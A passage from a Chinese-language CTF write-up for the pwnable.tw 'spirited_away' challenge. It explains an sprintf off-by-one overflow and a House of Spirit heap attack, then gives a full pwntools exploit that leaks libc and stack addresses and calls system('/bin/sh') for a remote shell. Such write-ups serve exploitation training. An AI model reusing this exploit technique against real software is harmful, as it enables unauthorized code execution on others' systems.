数组v1的大小是0xE8-0xB0=0x38,也就是56,在sprintf中输出时,已有的字符串是54,其中将通过格式化输出计数器cnt的值,cnt是个数值,但作为char输出时,每一个数就是1个byte,故当cnt为三位数时,将放生溢出,v1是栈变量,存储在其后的是变量nbytes和var_AC、char数组s、var_58、char数组buf在堆中的地址,恰好,nbytes是read函数用来读取用户输入的name和comment的大小,当cnt为三位数时,整个字符串的最后一位'n'将会溢出到nbytes所在的内存空间,char型的‘n’被当作size_t型,也就是0x6E,即110。于是这样可达到将原本大小为60的name、comment扩大为110,同时,在read函数中用来存储用户输入的buf和s数组原本设定的大小是0x3C和0x50,两个数组将发生溢出
free的对象是buf数组在堆上。于是,可以在栈上构建一个伪造的chunk,然后通过溢出,覆盖原本在栈上,指向buf内存空间的指针,然后通过操作触发free,将我们伪造的chunk加入到fastbin中,最后通过malloc得到伪造的目标堆块
from pwn import *
def create(name,age,reason,comment):
# Please enter your name:
p.recvuntil('name: ')
p.send(name)
# Please enter your age:
p.recvuntil('age: ')
p.sendline(age)
# Why did you came to see this movie?
p.recvuntil('movie? ')
p.send(reason)
# Please enter your comment:
p.recvuntil('comment: ')
p.send(comment)
def nextOne(chooise):
# Would you like to leave another comment? <y/n>:
p.recvuntil('<y/n>: ')
p.send(chooise)
def exploit():
# leaking libc
# gdb.attach(p, 'b*0x080486F8\nc')
create('1'*0x3c,'-2','2'*0x18,'3'*0x3c)
p.recvuntil('Reason: ')
p.recvuntil('2'*0x18)
_IO_file_sync = u32(p.recv(4))-7
log.info('_IO_file_sync:'+hex(_IO_file_sync)) # print info
libc.address = _IO_file_sync-libc.symbols['_IO_file_sync']
system = libc.symbols['system']
log.info('system:'+hex(system))
binsh_addr = next(libc.search('/bin/sh'))
log.info('binsh_addr:'+hex(binsh_addr))
nextOne('y')
# leaking stack
# gdb.attach(p, 'b*0x080486F8\nc')
create('1'*0x3c,'-1','2'*0x50,'3'*0x3c)
p.recvuntil('Reason: ')
p.recvuntil('2'*0x50)
stack = u32(p.recv(4))
log.info('stack:'+hex(stack))
nextOne('y')
# trigger stack overflow
force = log.progress('Trigger')
for i in range(100):
force.status("{0}".format(i))
create('1'*0x3c, str(i), '2'*0x50, '3'*0x3c)
nextOne('y')
# House of Spirit
# gdb.attach(p, 'b *0x80488C6')
reason = p32(0x41)+60*'1'+p32(0x1234)
reason = reason.rjust(0x50,'2')
comment = '3'*0x50
comment += p32(100)
comment += p32(stack-0x60)
create('1'*0x3c,'100',reason,comment)
nextOne('y')
payload = 'A'*68
payload += p32(system)
payload += p32(0xdeadbeef)
payload += p32(binsh_addr)
create(payload,'101','2'*0x50,'3'*0x3c)
nextOne('n')
p.interactive()
if __name__ == '__main__':
context.binary = "./spirited_away"
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
e = ELF('./spirited_away')
flag = 1
if flag:
p = remote("chall.pwnable.tw", 10204)
libc = ELF('./libc_32.so.6')
exploit()
else:
p = process('./spirited_away')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
exploit()
